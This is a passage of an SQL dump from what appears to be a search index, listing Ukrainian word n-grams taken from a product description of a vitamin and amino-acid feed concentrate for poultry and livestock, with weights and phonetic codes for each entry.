курей',0,1,1.2667,'к000',1,'*'),(1546165,'12 курей 20','12 курей 20',0,1,1.3667,'к000',1,'*'),(1546166,'1250','1250',0,0,0.4,'',1,'*'),(1546167,'1250 мг','1250 мг',0,1,1.2333,'м000',1,'*'),(1546168,'1250 мг вітамін','1250 мг вітамін',0,1,1.5,'м000',1,'*'),(1546169,'1750','1750',0,0,0.4,'',1,'*'),(1546170,'1750 мг','1750 мг',0,1,1.2333,'м000',1,'*'),(1546171,'1750 мг вітамін','1750 мг вітамін',0,1,1.5,'м000',1,'*'),(1546172,'18','18',0,0,0.2,'',2,'*'),(1546173,'18 000','18 000',0,1,1.2,'',1,'*'),(1546174,'18 000 мг','18 000 мг',0,1,1.3,'м000',1,'*'),(1546175,'2 л','2 л',0,1,1.1,'л000',1,'*'),(1546176,'2 л питної','2 л питної',0,1,1.3333,'л000',1,'*'),(1546177,'2-3','2-3',0,0,0.3,'',3,'*'),(1546178,'2-3 г','2-3 г',0,1,1.1667,'г000',1,'*'),(1546179,'2-3 г на','2-3 г на',0,1,1.2667,'г000',1,'*'),(1546180,'2-4','2-4',0,0,0.3,'',1,'*'),(1546181,'2-4 місяці','2-4 місяці',0,1,1.3333,'м000',1,'*'),(1546182,'2-4 місяці 0,4-0,8','2-4 місяці 0,4-0,8',0,1,1.6,'м000',1,'*'),(1546183,'20 000 мг','20 000 мг',0,1,1.3,'м000',1,'*'),(1546184,'20 бройлерів','20 бройлерів',0,1,1.4,'б000',1,'*'),(1546185,'20 бройлерів або','20 бройлерів або',0,1,1.5333,'б000',1,'*'),(1546186,'20-25','20-25',0,0,0.5,'',1,'*'),(1546187,'20-25 курчат','20-25 курчат',0,1,1.4,'к000',1,'*'),(1546188,'20-25 курчат 5','20-25 курчат 5',0,1,1.4667,'к000',1,'*'),(1546189,'2000 мг вітамін','2000 мг вітамін',0,1,1.5,'м000',1,'*'),(1546190,'2459','2459',0,0,0.4,'',1,'*'),(1546191,'2500','2500',0,0,0.4,'',2,'*'),(1546192,'2500 мг','2500 мг',0,1,1.2333,'м000',1,'*'),(1546193,'2500 мг вітамін','2500 мг вітамін',0,1,1.5,'м000',1,'*'),(1546194,'3 5','3 5',0,1,1.1,'',1,'*'),(1546195,'3 5 10','3 5 10',0,1,1.2,'',1,'*'),(1546196,'3-7','3-7',0,0,0.3,'',1,'*'),(1546197,'3-7 днів','3-7 днів',0,1,1.2667,'д000',1,'*'),(1546198,'3-7 днів з','3-7 днів з',0,1,1.3333,'д000',1,'*'),(1546199,'33','33',0,0,0.2,'',2,'*'),(1546200,'33 мг','33 мг',0,1,1.1667,'м000',1,'*'),(1546201,'33 мг лактозу','33 мг лактозу',0,1,1.4333,'м000',1,'*'),(1546202,'400','400',0,0,0.3,'',1,'*'),(1546203,'400 мг','400 мг',0,1,1.2,'м000',1,'*'),(1546204,'400 мг вітамін','400 мг вітамін',0,1,1.4667,'м000',1,'*'),(1546205,'4000 мг метіонін','4000 мг метіонін',0,1,1.5333,'м000',1,'*'),(1546206,'4000 мг триптофан','4000 мг триптофан',0,1,1.5667,'м000',1,'*'),(1546207,'5 10','5 10',0,1,1.1333,'',1,'*'),(1546208,'5 10 г','5 10 г',0,1,1.2,'г000',1,'*'),(1546209,'5 індиків','5 індиків',0,1,1.3,'і000',1,'*'),(1546210,'5 індиків поросятам','5 індиків поросятам',0,1,1.6333,'і000',1,'*'),(1546211,'5-10','5-10',0,0,0.4,'',2,'*'),(1546212,'5-10 г','5-10 г',0,1,1.2,'г000',1,'*'),(1546213,'5-10 г на','5-10 г на',0,1,1.3,'г000',1,'*'),(1546214,'5-10 днів','5-10 днів',0,1,1.3,'д000',1,'*'),(1546215,'5-10 днів протипоказання','5-10 днів протипоказання',0,1,1.8,'д000',1,'*'),(1546216,'5500','5500',0,0,0.4,'',1,'*'),(1546217,'5500 мг','5500 мг',0,1,1.2333,'м000',1,'*'),(1546218,'5500 мг вітамін','5500 мг вітамін',0,1,1.5,'м000',1,'*'),(1546219,'600','600',0,0,0.3,'',1,'*'),(1546220,'600 мг','600 мг',0,1,1.2,'м000',1,'*'),(1546221,'600 мг селен','600 мг селен',0,1,1.4,'м000',1,'*'),(1546222,'6000','6000',0,0,0.4,'',1,'*'),(1546223,'6000 мг','6000 мг',0,1,1.2333,'м000',1,'*'),(1546224,'6000 мг вітамін','6000 мг вітамін',0,1,1.5,'м000',1,'*'),(1546225,'7,5','7,5',0,0,0.3,'',1,'*'),(1546226,'7,5 мг','7,5 мг',0,1,1.2,'м000',1,'*'),(1546227,'7,5 мг лізин','7,5 мг лізин',0,1,1.4,'м000',1,'*'),(1546228,'700','700',0,0,0.3,'',1,'*'),(1546229,'700 000','700 000',0,1,1.2333,'',1,'*'),(1546230,'700 000 од','700 000 од',0,1,1.3333,'о000',1,'*'),(1546231,'kompleks','kompleks',0,0,0.5333,'K5142',1,'*'),(1546232,'kompleks nutrifarm','kompleks nutrifarm',0,1,1.6,'K5142536165',1,'*'),(1546233,'nutrifarm','nutrifarm',0,0,0.6,'N36165',1,'*'),(1546234,'vitaminnij kompleks','vitaminnij kompleks',0,1,1.6333,'V3525142',1,'*'),(1546235,'vitaminnij kompleks nutrifarm','vitaminnij kompleks nutrifarm',0,1,1.9667,'V3525142536165',1,'*'),(1546236,'і амінокислот','і амінокислот',0,1,1.4333,'і000',1,'*'),(1546237,'і амінокислот в','і амінокислот в',0,1,1.5,'і000',1,'*'),(1546238,'і випоюють','і випоюють',0,1,1.3333,'і000',1,'*'),(1546239,'і випоюють розчин','і випоюють розчин',0,1,1.5667,'і000',1,'*'),(1546240,'і диференціації','і диференціації',0,1,1.5,'і000',1,'*'),(1546241,'і диференціації всіх','і диференціації всіх',0,1,1.6667,'і000',1,'*'),(1546242,'і ефективності','і ефективності',0,1,1.4667,'і000',1,'*'),(1546243,'і ефективності використання','і ефективності використання',0,1,1.9,'і000',1,'*'),(1546244,'і козлятам','і козлятам',0,1,1.3333,'і000',1,'*'),(1546245,'і козлятам 0,5-0,8','і козлятам 0,5-0,8',0,1,1.6,'і000',1,'*'),(1546246,'і лошатам','і лошатам',0,1,1.3,'і000',1,'*'),(1546247,'і лошатам 2-3','і лошатам 2-3',0,1,1.4333,'і000',1,'*'),(1546248,'і птиці','і птиці',0,1,1.2333,'і000',1,'*'),(1546249,'і птиці на','і птиці на',0,1,1.3333,'і000',1,'*'),(1546250,'і птиці стрес-факторів','і птиці стрес-факторів',0,1,1.7333,'і000',1,'*'),(1546251,'імунної','імунної',0,0,0.4667,'і000',1,'*'),(1546252,'імунної системи','імунної системи',0,1,1.5,'і000',1,'*'),(1546253,'імунної системи під','імунної системи під',0,1,1.6333,'і000',1,'*'),(1546254,'індиків','індиків',0,0,0.4667,'і000',1,'*'),(1546255,'індиків поросятам','індиків поросятам',0,1,1.5667,'і000',1,'*'),(1546256,'індиків поросятам віком','індиків поросятам віком',0,1,1.7667,'і000',1,'*'),(1546257,'а ретинол','а ретинол',0,1,1.3,'а000',1,'*'),(1546258,'а ретинол 10','а ретинол 10',0,1,1.4,'а000',1,'*'),(1546259,'або','або',0,0,0.2,'а000',11,'*'),(1546260,'або гусей','або гусей',0,1,1.3,'а000',1,'*'),(1546261,'або гусей 20-25','або гусей 20-25',0,1,1.5,'а000',1,'*'),(1546262,'або у','або у',0,1,1.1667,'а000',1,'*'),(1546263,'або у суміші','або у суміші',0,1,1.4,'а000',1,'*'),(1546264,'активізує','активізує',0,0,0.6,'а000',1,'*'),(1546265,'активізує окисно-відновні','активізує окисно-відновні',0,1,1.8333,'а000',1,'*'),(1546266,'активізує окисно-відновні реакції','активізує окисно-відновні реакції',0,1,2,'а000',1,'*'),(1546267,'активності','активності',0,0,0.6667,'а000',1,'*'),(1546268,'активності самців','активності самців',0,1,1.5667,'а000',1,'*'),(1546269,'активності самців та','активності самців та',0,1,1.6667,'а000',1,'*'),(1546270,'амінокислот','амінокислот',0,0,0.7333,'а000',1,'*'),(1546271,'амінокислот в','амінокислот в',0,1,1.4333,'а000',1,'*'),(1546272,'амінокислот в кормах','амінокислот в кормах',0,1,1.6667,'а000',1,'*'),(1546273,'амінокислот та','амінокислот та',0,1,1.4667,'а000',1,'*'),(1546274,'амінокислот та селену','амінокислот та селену',0,1,1.7,'а000',1,'*'),(1546275,'амінокислоти','амінокислоти',0,0,0.8,'а000',1,'*'),(1546276,'амінокислоти необхідні','амінокислоти необхідні',0,1,1.7333,'а000',1,'*'),(1546277,'амінокислоти необхідні для','амінокислоти необхідні для',0,1,1.8667,'а000',1,'*'),(1546278,'аскорбінова','аскорбінова',0,0,0.7333,'а000',1,'*'),(1546279,'аскорбінова кислота','аскорбінова кислота',0,1,1.6333,'а000',1,'*'),(1546280,'аскорбінова кислота 20','аскорбінова кислота 20',0,1,1.7333,'а000',1,'*'),(1546281,'ацетат','ацетат',0,0,0.4,'а000',1,'*'),(1546282,'ацетат 5500','ацетат 5500',0,1,1.3667,'а000',1,'*'),(1546283,'ацетат 5500 мг','ацетат 5500 мг',0,1,1.4667,'а000',1,'*'),(1546284,'білка','білка',0,0,0.3333,'б000',1,'*'),(1546285,'білка селен','білка селен',0,1,1.3667,'б000',1,'*'),(1546286,'білка селен бере','білка селен бере',0,1,1.5333,'б000',1,'*'),(1546287,'бере','бере',0,0,0.2667,'б000',2,'*'),(1546288,'бере участь','бере участь',0,1,1.3667,'б000',1,'*'),(1546289,'бере участь в','бере участь в',0,1,1.4333,'б000',1,'*'),(1546290,'бройлерів','бройлерів',0,0,0.6,'б000',1,'*'),(1546291,'бройлерів або','бройлерів або',0,1,1.4333,'б000',1,'*'),(1546292,'бройлерів або гусей','бройлерів або гусей',0,1,1.6333,'б000',1,'*'),(1546293,'в зазначених','в зазначених',0,1,1.4,'в000',1,'*'),(1546294,'в зазначених дозах','в зазначених дозах',0,1,1.6,'в000',1,'*'),(1546295,'в кормах','в кормах',0,1,1.2667,'в000',1,'*'),(1546296,'в кормах для','в кормах для',0,1,1.4,'в000',1,'*'),(1546297,'в кормах міститься','в кормах міститься',0,1,1.6,'в000',1,'*'),(1546298,'в місцевостях','в місцевостях',0,1,1.4333,'в000',1,'*'),(1546299,'в місцевостях де','в місцевостях де',0,1,1.5333,'в000',1,'*'),(1546300,'в метаболізмі','в метаболізмі',0,1,1.4333,'в000',1,'*'),(1546301,'в метаболізмі тиреоїдних','в метаболізмі тиреоїдних',0,1,1.8,'в000',1,'*'),(1546302,'в організмі','в організмі',0,1,1.3667,'в000',1,'*'),(1546303,'в організмі тварин','в організмі тварин',0,1,1.6,'в000',1,'*'),(1546304,'в організмі факторрозвитку','в організмі факторрозвитку',0,1,1.8667,'в000',1,'*'),(1546305,'в печінці','в печінці',0,1,1.3,'в000',1,'*'),(1546306,'в печінці при','в печінці при',0,1,1.4333,'в000',1,'*'),(1546307,'в сухому недоступному','в сухому недоступному',0,1,1.7,'в000',1,'*'),(1546308,'в1 тіамін','в1 тіамін',0,1,1.3,'в000',1,'*'),(1546309,'в1 тіамін 1250','в1 тіамін 1250',0,1,1.4667,'в000',1,'*'),(1546310,'в12 ціанокобаламін','в12 ціанокобаламін',0,1,1.6,'в000',1,'*'),(1546311,'в12 ціанокобаламін 7,5','в12 ціанокобаламін 7,5',0,1,1.7333,'в000',1,'*'),(1546312,'в2 рибофлавін','в2 рибофлавін',0,1,1.4333,'в000',1,'*'),(1546313,'в2 рибофлавін 2500','в2 рибофлавін 2500',0,1,1.6,'в000',1,'*'),(1546314,'в3','в3',0,0,0.1333,'в000',1,'*'),(1546315,'в3 нікотинова','в3 нікотинова',0,1,1.4333,'в000',1,'*'),(1546316,'в3 нікотинова кислота','в3 нікотинова кислота',0,1,1.7,'в000',1,'*'),(1546317,'в5','в5',0,0,0.1333,'в000',1,'*'),(1546318,'в5 пантотенова','в5 пантотенова',0,1,1.4667,'в000',1,'*'),(1546319,'в5 пантотенова кислота','в5 пантотенова кислота',0,1,1.7333,'в000',1,'*'),(1546320,'в6 піридоксин','в6 піридоксин',0,1,1.4333,'в000',1,'*'),(1546321,'в6 піридоксин 2000','в6 піридоксин 2000',0,1,1.6,'в000',1,'*'),(1546322,'в9','в9',0,0,0.1333,'в000',1,'*'),(1546323,'в9 фолієва','в9 фолієва',0,1,1.3333,'в000',1,'*'),(1546324,'в9 фолієва кислота','в9 фолієва кислота',0,1,1.6,'в000',1,'*'),(1546325,'від жовтого','від жовтого',0,1,1.3667,'в000',1,'*'),(1546326,'від жовтого до','від жовтого до',0,1,1.4667,'в000',1,'*'),(1546327,'відіграють','відіграють',0,0,0.6667,'в000',1,'*'),(1546328,'відіграють роль','відіграють роль',0,1,1.5,'в000',1,'*'),(1546329,'відіграють роль каталізаторів','відіграють роль каталізаторів',0,1,1.9667,'в000',1,'*'),(1546330,'віком','віком',0,0,0.3333,'в000',1,'*'),(1546331,'віком 2-4','віком 2-4',0,1,1.3,'в000',1,'*'),(1546332,'віком 2-4 місяці','віком 2-4 місяці',0,1,1.5333,'в000',1,'*'),(1546333,'вітамін а ретинол','вітамін а ретинол',0,1,1.5667,'в000',1,'*'),(1546334,'вітамін в1 тіамін','вітамін в1 тіамін',0,1,1.5667,'в000',1,'*'),(1546335,'вітамін в12 ціанокобаламін','вітамін в12 ціанокобаламін',0,1,1.8667,'в000',1,'*'),(1546336,'вітамін в2 рибофлавін','вітамін в2 рибофлавін',0,1,1.7,'в000',1,'*'),(1546337,'вітамін в3','вітамін в3',0,1,1.3333,'в000',1,'*'),(1546338,'вітамін в3 нікотинова','вітамін в3 нікотинова',0,1,1.7,'в000',1,'*'),(1546339,'вітамін в5','вітамін в5',0,1,1.3333,'в000',1,'*'),(1546340,'вітамін в5 пантотенова','вітамін в5 пантотенова',0,1,1.7333,'в000',1,'*'),(1546341,'вітамін в6 піридоксин','вітамін в6 піридоксин',0,1,1.7,'в000',1,'*'),(1546342,'вітамін в9','вітамін в9',0,1,1.3333,'в000',1,'*'),(1546343,'вітамін в9 фолієва','вітамін в9 фолієва',0,1,1.6,'в000',1,'*'),(1546344,'вітамін д3 холекальциферол','вітамін д3 холекальциферол',0,1,1.8667,'в000',1,'*'),(1546345,'вітамін е токоферол','вітамін е токоферол',0,1,1.6333,'в000',1,'*'),(1546346,'вітамін к3 менадіон','вітамін к3 менадіон',0,1,1.6333,'в000',1,'*'),(1546347,'вітамін с аскорбінова','вітамін с аскорбінова',0,1,1.7,'в000',1,'*'),(1546348,'вітамінів амінокислот','вітамінів амінокислот',0,1,1.7,'в000',1,'*'),(1546349,'вітамінів амінокислот та','вітамінів амінокислот та',0,1,1.8,'в000',1,'*'),(1546350,'вітаміни','вітаміни',0,0,0.5333,'в000',1,'*'),(1546351,'вітаміни відіграють','вітаміни відіграють',0,1,1.6333,'в000',1,'*'),(1546352,'вітаміни відіграють роль','вітаміни відіграють роль',0,1,1.8,'в000',1,'*'),(1546353,'вітамінний комплекс','вітамінний комплекс',0,1,1.6333,'в000',1,'*'),(1546354,'вітамінний комплекс нутріфарм','вітамінний комплекс нутріфарм',0,1,1.9667,'в000',1,'*'),(1546355,'вітамінно-амінокислотного','вітамінно-амінокислотного',0,0,1,'в000',1,'*'),(1546356,'вітамінно-амінокислотного концентрату','вітамінно-амінокислотного концентрату',0,1,2,'в000',1,'*'),(1546357,'вітамінно-амінокислотного концентрату зумовлені','вітамінно-амінокислотного концентрату зумовлені',0,1,2,'в000',1,'*'),(1546358,'вакцинації','вакцинації',0,0,0.6667,'в000',1,'*'),(1546359,'вакцинації підвищення','вакцинації підвищення',0,1,1.7,'в000',1,'*'),(1546360,'вакцинації підвищення продуктивності','вакцинації підвищення продуктивності',0,1,2,'в000',1,'*'),(1546361,'виготовлення приготовлений','виготовлення приготовлений',0,1,1.8667,'в000',1,'*'),(1546362,'виготовлення приготовлений розчин','виготовлення приготовлений розчин',0,1,2,'в000',1,'*'),(1546363,'використання кормів','використання кормів',0,1,1.6333,'в000',1,'*'),(1546364,'використання кормів підвищення','використання кормів підвищення',0,1,2,'в000',1,'*'),(1546365,'використання маточного','використання маточного',0,1,1.7333,'в000',1,'*'),(1546366,'використання маточного поголів\'я','використання маточного поголів',0,1,2,'в000',1,'*'),(1546367,'використовувати','використовувати',0,0,1,'в000',2,'*'),(1546368,'використовувати в','використовувати в',0,1,1.5667,'в000',1,'*'),(1546369,'використовувати в місцевостях','використовувати в місцевостях',0,1,1.9667,'в000',1,'*'),(1546370,'використовують','використовують',0,0,0.9333,'в000',1,'*'),(1546371,'використовують з','використовують з',0,1,1.5333,'в000',1,'*'),(1546372,'використовують з профілактичною','використовують з профілактичною',0,1,2,'в000',1,'*'),(1546373,'випоюють','випоюють',0,0,0.5333,'в000',1,'*'),(1546374,'випоюють розчин','випоюють розчин',0,1,1.5,'в000',1,'*'),(1546375,'випоюють розчин протягом','випоюють розчин протягом',0,1,1.8,'в000',1,'*'),(1546376,'випуску пластикові','випуску пластикові',0,1,1.6,'в000',2,'*'),(1546377,'випуску пластикові пакети','випуску пластикові пакети',0,1,1.8333,'в000',1,'*'),(1546378,'виробник пп','виробник пп',0,1,1.3667,'в000',3,'*'),(1546379,'виробник пп фірма','виробник пп фірма',0,1,1.5667,'в000',3,'*'),(1546380,'високий','високий',0,0,0.4667,'в000',1,'*'),(1546381,'високий темп','високий темп',0,1,1.4,'в000',1,'*'),(1546382,'високий темп розвитку','високий темп розвитку',0,1,1.7,'в000',1,'*'),(1546383,'високому','високому',0,0,0.5333,'в000',1,'*'),(1546384,'високому рівні','високому рівні',0,1,1.4667,'в000',1,'*'),(1546385,'високому рівні при','високому рівні при',0,1,1.6,'в000',1,'*'),(1546386,'вище','вище',0,0,0.2667,'в000',1,'*'),(1546387,'вище 25','вище 25',0,1,1.2333,'в000',1,'*'),(1546388,'вище 25 с','вище 25 с',0,1,1.3,'в000',1,'*'),(1546389,'властивостi властивості','властивостi властивості',0,1,1.7667,'в000',1,'*'),(1546390,'властивостi властивості водорозчинного','властивостi властивості водорозчинного',0,1,2,'в000',1,'*'),(1546391,'властивості','властивості',0,0,0.7333,'в000',4,'*'),(1546392,'властивості водорозчинного','властивості водорозчинного',0,1,1.8667,'в000',1,'*'),(1546393,'властивості водорозчинного вітамінно-амінокислотного','властивості водорозчинного вітамінно-амінокислотного',0,1,2,'в000',1,'*'),(1546394,'воді','воді',0,0,0.2667,'в000',2,'*'),(1546395,'воді склад','воді склад',0,1,1.3333,'в000',2,'*'),(1546396,'воді склад 1','воді склад 1',0,1,1.4,'в000',1,'*'),(1546397,'воді у','воді у',0,1,1.2,'в000',1,'*'),(1546398,'воді у співвідношенні','воді у співвідношенні',0,1,1.7,'в000',1,'*'),(1546399,'воді чи','воді чи',0,1,1.2333,'в000',1,'*'),(1546400,'воді чи у','воді чи у',0,1,1.3,'в000',1,'*'),(1546401,'води і','води і',0,1,1.2,'в000',1,'*'),(1546402,'води і випоюють','води і випоюють',0,1,1.5,'в000',1,'*'),(1546403,'водорозчинного','водорозчинного',0,0,0.9333,'в000',1,'*'),(1546404,'водорозчинного вітамінно-амінокислотного','водорозчинного вітамінно-амінокислотного',0,1,2,'в000',1,'*'),(1546405,'водорозчинного вітамінно-амінокислотного концентрату','водорозчинного вітамінно-амінокислотного концентрату',0,1,2,'в000',1,'*'),(1546406,'водою або','водою або',0,1,1.3,'в000',2,'*'),(1546407,'водою або у','водою або у',0,1,1.3667,'в000',1,'*'),(1546408,'впливу','впливу',0,0,0.4,'в000',2,'*'),(1546409,'впливу на','впливу на',0,1,1.3,'в000',2,'*'),(1546410,'впливу на організм','впливу на організм',0,1,1.6,'в000',1,'*'),(1546411,'всіх','всіх',0,0,0.2667,'в000',2,'*'),(1546412,'всіх клітин','всіх клітин',0,1,1.3667,'в000',1,'*'),(1546413,'всіх клітин в','всіх клітин в',0,1,1.4333,'в000',1,'*'),(1546414,'входять','входять',0,0,0.4667,'в000',2,'*'),(1546415,'входять до','входять до',0,1,1.3333,'в000',2,'*'),(1546416,'входять до його','входять до його',0,1,1.5,'в000',1,'*'),(1546417,'г зберiгання','г зберiгання',0,1,1.4,'г000',1,'*'),(1546418,'г зберiгання в','г зберiгання в',0,1,1.4667,'г000',1,'*'),(1546419,'г на','г на',0,1,1.1333,'г000',1,'*'),(1546420,'г на 2','г на 2',0,1,1.2,'г000',1,'*'),(1546421,'г на голову','г на голову',0,1,1.3667,'г000',1,'*'),(1546422,'г та','г та',0,1,1.1333,'г000',1,'*'),(1546423,'г та 1000','г та 1000',0,1,1.3,'г000',1,'*'),(1546424,'гіповітамінозів','гіповітамінозів',0,0,1,'г000',1,'*'),(1546425,'гіповітамінозів зниження','гіповітамінозів зниження',0,1,1.8,'г000',1,'*'),(1546426,'гіповітамінозів зниження впливу','гіповітамінозів зниження впливу',0,1,2,'г000',1,'*'),(1546427,'гарячий','гарячий',0,0,0.4667,'г000',1,'*'),(1546428,'гарячий корм','гарячий корм',0,1,1.4,'г000',1,'*'),(1546429,'гарячий корм форма','гарячий корм форма',0,1,1.6,'г000',1,'*'),(1546430,'голову','голову',0,0,0.4,'г000',2,'*'),(1546431,'голову концентрат','голову концентрат',0,1,1.5667,'г000',1,'*'),(1546432,'голову концентрат в','голову концентрат в',0,1,1.6333,'г000',1,'*'),(1546433,'голову телятам','голову телятам',0,1,1.4667,'г000',1,'*'),(1546434,'голову телятам і','голову телятам і',0,1,1.5333,'г000',1,'*'),(1546435,'голову хрякам','голову хрякам',0,1,1.4333,'г000',1,'*'),(1546436,'голову хрякам 5-10','голову хрякам 5-10',0,1,1.6,'г000',1,'*'),(1546437,'голову ягнятам','голову ягнятам',0,1,1.4667,'г000',1,'*'),(1546438,'голову ягнятам і','голову ягнятам і',0,1,1.5333,'г000',1,'*'),(1546439,'гормонів','гормонів',0,0,0.5333,'г000',1,'*'),(1546440,'гормонів гормонів','гормонів гормонів',0,1,1.5667,'г000',1,'*'),(1546441,'гормонів гормонів щитовидної','гормонів гормонів щитовидної',0,1,1.9333,'г000',1,'*'),(1546442,'гормонів щитовидної','гормонів щитовидної',0,1,1.6333,'г000',1,'*'),(1546443,'гормонів щитовидної залози','гормонів щитовидної залози',0,1,1.8667,'г000',1,'*'),(1546444,'готують','готують',0,0,0.4667,'г000',1,'*'),(1546445,'готують кожного','готують кожного',0,1,1.5,'г000',1,'*'),(1546446,'готують кожного дня','готують кожного дня',0,1,1.6333,'г000',1,'*'),(1546447,'гусей','гусей',0,0,0.3333,'г000',1,'*'),(1546448,'гусей 20-25','гусей 20-25',0,1,1.3667,'г000',1,'*'),(1546449,'гусей 20-25 курчат','гусей 20-25 курчат',0,1,1.6,'г000',1,'*'),(1546450,'д3 холекальциферол','д3 холекальциферол',0,1,1.6,'д000',1,'*'),(1546451,'д3 холекальциферол 700','д3 холекальциферол 700',0,1,1.7333,'д000',1,'*'),(1546452,'дітей місці','дітей місці',0,1,1.3667,'д000',1,'*'),(1546453,'дітей місці при','дітей місці при',0,1,1.5,'д000',1,'*'),(1546454,'де','де',0,0,0.1333,'д000',3,'*'),(1546455,'де в','де в',0,1,1.1333,'д000',1,'*'),(1546456,'де в кормах','де в кормах',0,1,1.3667,'д000',1,'*'),(1546457,'диференціації','диференціації',0,0,0.8667,'д000',1,'*'),(1546458,'диференціації всіх','диференціації всіх',0,1,1.6,'д000',1,'*'),(1546459,'диференціації всіх клітин','диференціації всіх клітин',0,1,1.8333,'д000',1,'*'),(1546460,'для 12','для 12',0,1,1.2,'д000',1,'*'),(1546461,'для 12 курей','для 12 курей',0,1,1.4,'д000',1,'*'),(1546462,'для дітей місці','для дітей місці',0,1,1.5,'д000',1,'*'),(1546463,'для росту','для росту',0,1,1.3,'д000',1,'*'),(1546464,'для росту і','для росту і',0,1,1.3667,'д000',1,'*'),(1546465,'для синтезу','для синтезу',0,1,1.3667,'д000',1,'*'),(1546466,'для синтезу білка','для синтезу білка',0,1,1.5667,'д000',1,'*'),(1546467,'для стимуляції','для стимуляції',0,1,1.4667,'д000',1,'*'),(1546468,'для стимуляції імунної','для стимуляції імунної',0,1,1.7333,'д000',1,'*'),(1546469,'для чого','для чого',0,1,1.2667,'д000',1,'*'),(1546470,'для чого розчиняють','для чого розчиняють',0,1,1.6333,'д000',1,'*'),(1546471,'днів','днів',0,0,0.2667,'д000',4,'*'),(1546472,'днів з','днів з',0,1,1.2,'д000',1,'*'),(1546473,'днів з лікувальною','днів з лікувальною',0,1,1.6,'д000',1,'*'),(1546474,'днів протипоказання','днів протипоказання',0,1,1.6333,'д000',1,'*'),(1546475,'днів протипоказання не','днів протипоказання не',0,1,1.7333,'д000',1,'*'),(1546476,'дня виготовлення приготовлений','дня виготовлення приготовлений',0,1,2,'д000',1,'*'),(1546477,'дня суміш','дня суміш',0,1,1.3,'д000',1,'*'),(1546478,'дня суміш з','дня суміш з',0,1,1.3667,'д000',1,'*'),(1546479,'до його','до його',0,1,1.2333,'д000',1,'*'),(1546480,'до його складу','до його складу',0,1,1.4667,'д000',1,'*'),(1546481,'до несприятливих','до несприятливих',0,1,1.5333,'д000',1,'*'),(1546482,'до несприятливих факторів','до несприятливих факторів',0,1,1.8333,'д000',1,'*'),(1546483,'до світло-коричневого','до світло-коричневого',0,1,1.7,'д000',1,'*'),(1546484,'до світло-коричневого кольору','до світло-коричневого кольору',0,1,1.9667,'д000',1,'*'),(1546485,'доби','доби',0,0,0.2667,'д000',2,'*'),(1546486,'доби виробник','доби виробник',0,1,1.4333,'д000',1,'*'),(1546487,'доби виробник пп','доби виробник пп',0,1,1.5333,'д000',1,'*'),(1546488,'доби розчин','доби розчин',0,1,1.3667,'д000',1,'*'),(1546489,'доби розчин готують','доби розчин готують',0,1,1.6333,'д000',1,'*'),(1546490,'доби що','доби що',0,1,1.2333,'д000',1,'*'),(1546491,'доби що достатньо','доби що достатньо',0,1,1.5667,'д000',1,'*'),(1546492,'додавати','додавати',0,0,0.5333,'д000',1,'*'),(1546493,'додавати у','додавати у',0,1,1.3333,'д000',1,'*'),(1546494,'додавати у гарячий','додавати у гарячий',0,1,1.6,'д000',1,'*'),(1546495,'дозах','дозах',0,0,0.3333,'д000',3,'*'),(1546496,'дозах домашній','дозах домашній',0,1,1.4667,'д000',1,'*'),(1546497,'дозах домашній птиці','дозах домашній птиці',0,1,1.6667,'д000',1,'*'),(1546498,'дозах розчиняють','дозах розчиняють',0,1,1.5333,'д000',1,'*'),(1546499,'дозах розчиняють у','дозах розчиняють у',0,1,1.6,'д000',1,'*'),(1546500,'дозування перорально','дозування перорально',0,1,1.6667,'д000',2,'*'),(1546501,'дозування перорально з','дозування перорально з',0,1,1.7333,'д000',1,'*'),(1546502,'домашній','домашній',0,0,0.5333,'д000',2,'*'),(1546503,'домашній птиці','домашній птиці',0,1,1.4667,'д000',1,'*'),(1546504,'домашній птиці розчин','домашній птиці розчин',0,1,1.7,'д000',1,'*'),(1546505,'достатньо','достатньо',0,0,0.6,'д000',3,'*'),(1546506,'достатньо для','достатньо для',0,1,1.4333,'д000',1,'*'),(1546507,'достатньо для 12','достатньо для 12',0,1,1.5333,'д000',1,'*'),(1546508,'е токоферол','е токоферол',0,1,1.3667,'е000',1,'*'),(1546509,'е токоферол ацетат','е токоферол ацетат',0,1,1.6,'е000',1,'*'),(1546510,'ефективності','ефективності',0,0,0.8,'е000',1,'*'),(1546511,'ефективності використання','ефективності використання',0,1,1.8333,'е000',1,'*'),(1546512,'ефективності використання кормів','ефективності використання кормів',0,1,2,'е000',1,'*'),(1546513,'жовтого до','жовтого до',0,1,1.3333,'ж000',1,'*'),(1546514,'жовтого до світло-коричневого','жовтого до світло-коричневого',0,1,1.9667,'ж000',1,'*'),(1546515,'з кормом','з кормом',0,1,1.2667,'з000',1,'*'),(1546516,'з кормом можна','з кормом можна',0,1,1.4667,'з000',1,'*'),(1546517,'з кормом та','з кормом та',0,1,1.3667,'з000',1,'*'),(1546518,'з кормом у','з кормом у',0,1,1.3333,'з000',1,'*'),(1546519,'з лікувальною','з лікувальною',0,1,1.4333,'з000',1,'*'),(1546520,'з лікувальною протягом','з лікувальною протягом',0,1,1.7333,'з000',1,'*'),(1546521,'з питною','з питною',0,1,1.2667,'з000',1,'*'),(1546522,'з питною водою','з питною водою',0,1,1.4667,'з000',1,'*'),(1546523,'з профілактичною','з профілактичною',0,1,1.5333,'з000',1,'*'),(1546524,'з профілактичною метою','з профілактичною метою',0,1,1.7333,'з000',1,'*'),(1546525,'забезпечує','забезпечує',0,0,0.6667,'з000',1,'*'),(1546526,'забезпечує високий','забезпечує високий',0,1,1.6,'з000',1,'*'),(1546527,'забезпечує високий темп','забезпечує високий темп',0,1,1.7667,'з000',1,'*'),(1546528,'задають тварині','задають тварині',0,1,1.5,'з000',1,'*'),(1546529,'задають тварині протягом','задають тварині протягом',0,1,1.8,'з000',1,'*'),(1546530,'задаютьгруповим','задаютьгруповим',0,0,1,'з000',1,'*'),(1546531,'задаютьгруповим способом','задаютьгруповим способом',0,1,1.8,'з000',1,'*'),(1546532,'задаютьгруповим способом для','задаютьгруповим способом для',0,1,1.9333,'з000',1,'*'),(1546533,'заздалегідь','заздалегідь',0,0,0.7333,'з000',1,'*'),(1546534,'заздалегідь та','заздалегідь та',0,1,1.4667,'з000',1,'*'),(1546535,'заздалегідь та використовують','заздалегідь та використовують',0,1,1.9667,'з000',1,'*'),(1546536,'зазначених','зазначених',0,0,0.6667,'з000',1,'*'),(1546537,'зазначених дозах','зазначених дозах',0,1,1.5333,'з000',1,'*'),(1546538,'зазначених дозах розчиняють','зазначених дозах розчиняють',0,1,1.9,'з000',1,'*'),(1546539,'залози','залози',0,0,0.4,'з000',1,'*'),(1546540,'залози які','залози які',0,1,1.3333,'з000',1,'*'),(1546541,'залози які необхідні','залози які необхідні',0,1,1.6667,'з000',1,'*'),(1546542,'запахом 